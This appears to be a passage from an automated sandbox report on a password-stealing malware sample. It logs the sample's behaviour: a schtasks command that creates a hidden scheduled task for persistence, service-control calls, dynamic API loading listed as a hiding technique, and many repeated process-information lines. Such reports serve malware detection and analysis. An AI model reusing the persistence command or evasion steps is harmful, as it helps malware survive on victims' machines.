            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,16_2_00418A00

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,16_2_0041A8DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
